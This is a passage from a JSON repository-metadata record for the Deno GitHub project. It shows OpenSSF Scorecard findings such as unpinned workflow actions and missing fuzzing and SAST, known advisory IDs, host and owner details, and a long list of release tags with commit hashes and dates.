.github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/